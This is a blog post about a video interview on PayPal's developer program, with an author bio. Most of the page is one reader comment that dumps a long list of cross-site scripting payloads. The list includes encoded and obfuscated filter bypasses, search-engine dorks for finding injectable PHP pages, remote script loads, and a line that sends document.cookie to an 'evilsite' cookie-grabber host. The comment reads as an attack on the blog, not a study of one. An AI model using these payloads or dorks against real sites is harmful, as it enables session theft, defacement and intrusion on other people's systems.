On July 1st, I joined Christian Perry of sfbeta on air to talk about PayPal | Developer and what we are trying to accomplish at the company. We get into why I joined the company, what I think we are trying to change with our efforts, and even go into how to stop world hunger, so there’s plenty of topic diversity for everyone.

Without going into too much detail, here’s our video interview:

About Jonathan LeBlanc

Jonathan LeBlanc is an Emmy award-winning software engineer, author of the O’Reilly books “Identity and Data Security for Web Development” and “Programming Social Applications”, and the Head of Global Developer Advocacy for PayPal. He specializes in identity, auth and security, hardware-to-web interconnectivity, and data mining techniques, as well as open source initiatives around social engagement, and works on the development of emerging initiatives toward building a more user-centric web.


3 Responses to sfbeta On Air Interview: Inside the PayPal Developer Network

  1. Narendra Bhati says:

    “>Pwned+by+Max+Govanni
    “>
    “>
    ?debugMode=1&dataURL=’>Click Me For XSS
    %22%3Cmarquee%3E%3Cimg%20src=k%20onerror=alert(%22PWNED%22)%20/
    %3E

    ‘>Click Me For XSS

    <B alert(1)>

    <B="alert(1)”>

    alert(1)

    alert(1)”(EOF)

    : alert(1)”>

    ({0:#0= alert /#0#/#0#(1)});

    2) (1.. __proto__ . e0 = alert )(1. e0 );

    3) a=a setter = alert ;

    4) _ =[[ $ ,__ ,,$$ ,,_$ ,$_ , _$_ ,,, $_$ ]=! ‘ ‘+[!{}]+

    inurl:”.php?cmd=”
    inurl:”.php?z=”

    inurl:”.php?q=”
    inurl:”.php?search=”
    inurl:”.php?query=”
    inurl:”.php?searchstring=”
    inurl:”.php?keyword=”
    inurl:”.php?file=”
    inurl:”.php?years=”
    inurl:”.php?txt=”
    inurl:”.php?tag=”
    inurl:”.php?max=”
    inurl:”.php?from=”
    inurl:”.php?author=”
    inurl:”.php?pass=”
    inurl:”.php?feedback=”
    inurl:”.php?mail=”
    inurl:”.php?cat=”
    inurl:”.php?vote=”
    inurl:search.php?q=
    inurl:com_feedpostold/feedpost.php?url=
    inurl:scrapbook.php?id=
    inurl:headersearch.php?sid=
    inurl:/poll/default.asp?catid=
    inurl:/search_results.php?search=

    PHNjcmlwdD5hbGVydCgnWFNTZWQgQnkgSW5qZWN0T3IgYW5kIEFwM3gnKTwvc2NyaXB0Pg%3D%3D
    Some Attack html & java Strings:
    ==========================
    XSSed By Bluff Master Hacker
    alert(“Hacked”)

    XSSed%20By%20%20lonelyr%20Hacker

    URL Encoded Strings using character codes to Bypass
    ==========================

    Some Java Disaster Strings
    ==========================
    nd_mode=”meteor”;nd_dest=”massive”;nd_control=”on”;nd_vAlign=”bottom”;nd_hAlign=”right”;nd_vMargin=”10″;nd_hMargin=”10″;nd_target=”_top”;

    nd_mode=”cow”;nd_vAlign=”bottom”;nd_hAlign=”right”;nd_vMargin=”10<s”;nd_hMargin=”10?;nd_target=”_top”;

    %3Cscript%20language=%94javascript%94%20src=%94http://www.netdisaster.com/js/mynd.js%94%3E%3C/script%3E

    Any of your Image link
    ==========================

    http://go4webapps.com/wp-content/uploads…utton1.jpg

    <IMG SRC=”javascript:alert(1);”>

    onmouseover=alert(1);

    ¼script¾alert(¢XSS¢)¼/script¾

    BODY{background:url(“javascript:alert(‘XSS’)”)}
    %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3eJavascript
    .XSS{background-image:url(“javascript:alert(‘XSS’)”);}
    alert(‘XSS’);
    data:text/html,test
    exp/*
    <META HTTP-EQUIV="Link" Content="; REL=stylesheet”>
    data:text/html;base64,dGVzdA==
    document.write(atob(/dGVzdA==/.source));
    document.write(/test/.source);
    document.write(String.fromCharCode(116,101,115,116,11));
    document.write(“x74x65x73x74x0A”);
    <LINK REL=”stylesheet” HREF=”http://ha.ckers.org/xss.css”>

    <DIV STYLE="background-image:07507206C028'06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029'029"
    string.fromCharCode(60, 115, 99, 114, 105, 112, 116, 32, 116, 121, 112, 101, 61, 118, 98, 115, 99, 114, 105, 112, 116, 62, 77, 115, 103, 66, 111, 120, 40, 48, 41, 60, 47, 115, 99, 114, 105, 112, 116, 62, 13, 10, 13, 10, 39, 39, 59, 33, 45, 45, 34, 60, 88, 83, 83, 62, 61, 38, 123, 40, 41, 125, 13, 10, 13, 10, 39, 62, 47, 47, 92, 92, 44, 60, 39, 62, 34, 62, 34, 62, 34, 42, 34, 13, 10)
    %3C%73%63%72%69%70%74%20%74%79%70%65%3D%76%62%73%63%72%69%70%74%3E%4D%73%67%42%6F%78%28%30%29%3C%2F%73%63%72%69%70%74%3E%0D%0A%0D%0A%27%27%3B%21%2D%2D%22%3C%58%53%53%3E%3D%26%7B%28%29%7D%0D%0A%0D%0A%27%3E%2F%2F%5C%5C%2C%3C%27%3E%22%3E%22%3E%22%2A%22%0D%0A

    <script type=vbscript>MsgBox(0)</script> '';!--"<XSS>=&{()} '>//\\,<'>">">"*"

    &#60&#115&#99&#114&#105&#112&#116&#32&#116&#121&#112&#101&#61&#118&#98&#115&#99&#114&#105&#112&#116&#62&#77&#115&#103&#66&#111&#120&#40&#48&#41&#60&#47&#115&#99&#114&#105&#112&#116&#62&#13&#10&#13&#10&#39&#39&#59&#33&#45&#45&#34&#60&#88&#83&#83&#62&#61&#38&#123&#40&#41&#125&#13&#10&#13&#10&#39&#62&#47&#47&#92&#92&#44&#60&#39&#62&#34&#62&#34&#62&#34&#42&#34&#13&#10

    a=”get”;
    b=”URL(“”;
    c=”javascript:”;
    d=”alert(‘XSS’);”)”;
    eval(a+b+c+d)
    PHNjcmlwdCB0eXBlPXZic2NyaXB0Pk1zZ0JveCgwKTwvc2NyaXB0Pg0KDQonJzshLS0iPFhTUz49JnsoKX0NCg0KJz4vL1xcLDwnPiI+Ij4iKiINCg==

    <IMG SRC="javascript:alert(‘XSS’)”>

    Code:
    MsgBox(0)

    <t:set attributeName="innerHTML" to="XSSalert(“XSS”)”>

    ”;!–“=’>//\,”>”>”*”

    ‘); alert(‘XSS

    alert(1);

    alert(‘XSS’);

    alert(“XSS”)”>
    alert%28String.fromCharCode(84%2C72%2C73%2C83%2C32%2C83%2C73%2C84%2C?69%2C32%2C73%2C83%2C32%2C72%2C65%2C67%2C75%2C69%2C68%2C32%2C66%2C89%2C32%2C66%2C?76%2C85%2C70%2C70%2C32%2C77%2C65%2C83%2C84%2C69%2C82%2C32%2C72%2C65%2C67%2C75%2C?69%2C82%29%29;%2C89%2C32%2C66%2C?76%2C85%2C70%2C70%2C32%2C77%2C65%2C83%2C84%2C69%2C82%2C32%2C72%2C65%2C67%2C75%2C?69%2C82%29%29;

    %3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%2

    prompt(0)

    data:application/msword;base64,0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAPgADAP7

    /…………

    document.write(“x74x65x73x74x0A”);

    %3CIMG+DYNSRC%3D%5C%22javascript%3Aalert%28%27XSS%27%29%5C%22%3E++%3Cfont+style%3D%27color%3Aexpression%28alert%28document.cookie%29%29%27%3E++%3Cimg+src%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E++%3Cscript+language%3D%22JavaScript%22%3Ealert%28%27XSS%27%29%3C%2Fscript%3E++%3Cbody+onunload%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E++%3Cbody+onLoad%3D%22alert%28%27XSS%27%29%3B%22++%5Bcolor%3Dred%27+onmouseover%3D%22alert%28%27xss%27%29%22%5Dmouse+over%5B%2Fcolor%5D++%22%2F%3E%3C%2Fa%3E%3C%2F%3E%3Cimg+src%3D1.gif+onerror%3Dalert%281%29%3E++window.alert%28%22Bonjour+%21%22%29%3B++%3Cdiv+style%3D%22x%3Aexpression%28%28window.r%3D%3D1%29%3F%27%27%3Aeval%28%27r%3D1%3B++alert%28String.fromCharCode%2888%2C83%2C83%29%29%3B%27%29%29%22%3E++%3Ciframe%3C%3Fphp+echo+chr%2811%29%3F%3E+onload%3Dalert%28%27XSS%27%29%3E%3C%2Fiframe%3E++%22%3E%3Cscript+alert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E++%27%3E%3E%3Cmarquee%3E%3Ch1%3EXSS%3C%2Fh1%3E%3C%2Fmarquee%3E++%27%22%3E%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E++%27%22%3E%3E%3Cmarquee%3E%3Ch1%3EXSS%3C%2Fh1%3E%3C%2Fmarquee%3E++%3CMETA+HTTP-EQUIV%3D%5C%22refresh%5C%22+CONTENT%3D%5C%220%3Burl%3Djavascript%3Aalert%28%27XSS%27%29%3B%5C%22%3E++%3CMETA+HTTP-EQUIV%3D%5C%22refresh%5C%22+CONTENT%3D%5C%220%3B+URL%3Dhttp%3A%2F%2F%3BURL%3Djavascript%3Aalert%28%27XSS%27%29%3B%5C%22%3E++%3Cscript%3Evar+var+%3D+1%3B+alert%28var%29%3C%2Fscript%3E++%3CSTYLE+type%3D%22text%2Fcss%22%3EBODY%7Bbackground%3Aurl%28%22javascript%3Aalert%28%27XSS%27%29%22%29%7D%3C%2FSTYLE%3E++%3C%3F%3D%27%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%3F%3E++%3CIMG+SRC%3D%27vbscript%3Amsgbox%28%5C%22XSS%5C%22%29%27%3E++%22+onfocus%3Dalert%28document.domain%29+%22%3E+%3C%22++%3CFRAMESET%3E%3CFRAME+SRC%3D%5C%22javascript%3Aalert%28%27XSS%27%29%3B%5C%22%3E%3C%2FFRAMESET%3E++%3CSTYLE%3Eli+%7Blist-style-image%3A+url%28%5C%22javascript%3Aalert%28%27XSS%27%29%5C%22%29%3B%7D%3C%2FSTYLE%3E%3CUL%3E%3CLI%3EXSS++perl+-e+%27print+%5C%22%3CSCR%5C0IPT
%3Ealert%28%5C%22XSS%5C%22%29%3C%2FSCR%5C0IPT%3E%5C%22%3B%27+%3E+out++perl+-e+%27print+%5C%22%3CIMG+SRC%3Djava%5C0script%3Aalert%28%5C%22XSS%5C%22%29%3E%5C%22%3B%27+%3E+out++%3Cbr+size%3D%5C%22%26%7Balert%28%27XSS%27%29%7D%5C%22%3E++%3Cscrscriptipt%3Ealert%281%29%3C%2Fscrscriptipt%3E++%3C%2Fbr+style%3Da%3Aexpression%28alert%28%29%29%3E++%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E++%22%3E%3CBODY+onload%21%23%24%25%26%28%29*%7E%2B-_.%2C%3A%3B%3F%40%5B%2F%7C%5C%5D%5E%60%3Dalert%28%22XSS%22%29%3E++%5Bcolor%3Dred+width%3Dexpression%28alert%28123%29%29%5D%5Bcolor%5D++%3CBASE+HREF%3D%22javascript%3Aalert%28%27XSS%27%29%3B%2F%2F%22%3E++Execute%28MsgBox%28chr%2888%29%26chr%2883%29%26chr%2883%29%29%29%3C++%22%3E%3C%2Fiframe%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E++%3Cbody+onLoad%3D%22while%28true%29+alert%28%27XSS%27%29%3B%22%3E++%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281111%29%3C%2Fscript%3E++%3C%2Ftextarea%3E%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E++%27%22%22%3E%3Cscript+language%3D%22JavaScript%22%3E+alert%28%27X+%5CnS+%5CnS%27%29%3B%3C%2Fscript%3E++%3C%2Fscript%3E%3C%2Fscript%3E%3C%3C%3C%3Cscript%3E%3C%3E%3E%3E%3E%3C%3C%3Cscript%3Ealert%28123%29%3C%2Fscript%3E++%3Chtml%3E%3Cnoalert%3E%3Cnoscript%3E%28123%29%3C%2Fnoscript%3E%3Cscript%3E%28123%29%3C%2Fscript%3E++%3CINPUT+TYPE%3D%22IMAGE%22+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E++%27%3E%3C%2Fselect%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E++%27%3E%22%3E%3Cscript+src+%3D+%27http%3A%2F%2Fwww.site.com%2FXSS.js%27%3E%3C%2Fscript%3E++%7D%3C%2Fstyle%3E%3Cscript%3Ea%3Deval%3Bb%3Dalert%3Ba%28b%28%2FXSS%2F.source%29%29%3B%3C%2Fscript%3E++%3CSCRIPT%3Edocument.write%28%22XSS%22%29%3B%3C%2FSCRIPT%3E++a%3D%22get%22%3Bb%3D%22URL%22%3Bc%3D%22javascript%3A%22%3Bd%3D%22alert%28%27xss%27%29%3B%22%3Beval%28a%2Bb%2Bc%2Bd%29%3B++%3D%27%3E%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E++%3Cscript%2Bsrc%3D%22%3E%22%2Bsrc%3D%22http%3A%2F%2Fyoursite.com%2Fxss.js%3F69%252C69%22%3E%3C%2Fscript%3E++
%3Cbody+background%3Djavascript%3A%27%22%3E%3Cscript%3Ealert%28navigator.userAgent%29%3C%2Fscript%3E%3E%3C%2Fbody%3E++%22%3E%2FXaDoS%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cscript+src%3D%22http%3A%2F%2Fwww.site.com%2FXSS.js%22%3E%3C%2Fscript%3E++%22%3E%2FKinG-InFeT.NeT%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E++src%3D%22http%3A%2F%2Fwww.site.com%2FXSS.js%22%3E%3C%2Fscript%3E++data%3Atext%2Fhtml%3Bcharset%3Dutf-7%3Bbase64%2CIj48L3RpdGxlPjxzY3JpcHQ%2BYWxlcnQoMTMzNyk8L3NjcmlwdD4%3D++%21–%22+%2F%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E++%3Cscript%3Ealert%28%22XSS+by+%5Cnxss%22%29%3C%2Fscript%3E%3Cmarquee%3E%3Ch1%3EXSS+by+xss%3C%2Fh1%3E%3C%2Fmarquee%3E++%22%3E%3Cscript%3Ealert%28%22XSS+by+%5Cnxss%22%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+xss%3C%2Fh1%3E%3C%2Fmarquee%3E++%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%28%22XSS+by+%5Cnxss%22%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+xss%3C%2Fh1%3E%3C%2Fmarquee%3E++%3Cimg+%22%22%22%3E%3Cscript%3Ealert%28%22XSS+by+%5Cnxss%22%29%3C%2Fscript%3E%3Cmarquee%3E%3Ch1%3EXSS+by+xss%3C%2Fh1%3E%3C%2Fmarquee%3E++%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3Cmarquee%3E%3Ch1%3EXSS+by+xss%3C%2Fh1%3E%3C%2Fmarquee%3E++%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%22XSS+by+%5Cnxss%3C%2Fh1%3E%3C%2Fmarquee%3E++%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+xss%3C%2Fh1%3E%3C%2Fmarquee%3E++%3Ciframe+src%3D%22javascript%3Aalert%28%27XSS+by+%5Cnxss%27%29%3B%22%3E%3C%2Fiframe%3E%3Cmarquee%3E%3Ch1%3EXSS+by+xss%3C%2Fh1%3E%3C%2Fmarquee%3E

    location.href=”http://www.evilsite.org/cookiegrabber.php?cookie”+escape(document.cookie)

    <script>alert(‘XSS’);</script>

    alert(String.fromCharCode(88,83,83))

    @import’javascript:alert(“XSS”)’;

    <? echo('alert(“XSS”)’); ?>

    alert(‘XSS’)

    “>alert(0)

    alert(/xss/)

    alert(/xss/)

    alert(‘XSS’)

    window.alert(“Bonjour !”);

    <iframe onload=alert(‘XSS’)>

    “><script alert(String.fromCharCode(88,83,83))

    ‘>>XSS

    ‘”>>alert(‘XSS’)

    ‘”>>XSS

    var var = 1; alert(var)

    BODY{background:url(“javascript:alert(‘XSS’)”)}

    <?='alert(“XSS”)’?>

    ” onfocus=alert(document.domain) “> <"

    li {list-style-image: url(“javascript:alert(‘XSS’)”);}XSS

    perl -e ‘print “alert(“XSS”)”;’ > out

    perl -e ‘print “”;’ > out

    alert(1)

    alert(1)

    “>

    [color=red width=expression(alert(123))][color]

    Execute(MsgBox(chr(88)&chr(83)&chr(83)))alert(123)

    ‘”>alert(1111)

    ‘”>alert(document.cookie)

    ‘””> alert(‘X nS nS’);

    <<<>>><<alert(123)

    (123)(123)

    ‘>alert(123)

    ‘>”>

    }a=eval;b=alert;a(b(/XSS/.source));

    document.write(“XSS”);

    a=”get”;b=”URL”;c=”javascript:”;d=”alert(‘xss’);”;eval(a+b+c+d);

    =’>alert(“xss”)

    “+src=”http://yoursite.com/xss.js?69%2C69”>

    alert(navigator.userAgent)>

    “>/XaDoS/>alert(document.cookie)

    “>/KinG-InFeT.NeT/>alert(document.cookie)

    src=”http://www.site.com/XSS.js”>

    data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=

    !–” />alert(‘xss’);

    alert(“XSS by bhati”)XSS by bhati

    “>alert(“XSS by nxss”)>XSS by bhati

    ‘”>alert(“XSS by nbhati”)>XSS by xss

    alert(“XSS by nxss”)XSS by bhati

    alert(1337)XSS by xss

    “>alert(1337)”>alert(“XSS by nxss

    ‘”>alert(1337)>XSS by xss

    XSS by xss

  2. Narendra Bhati says:

    hello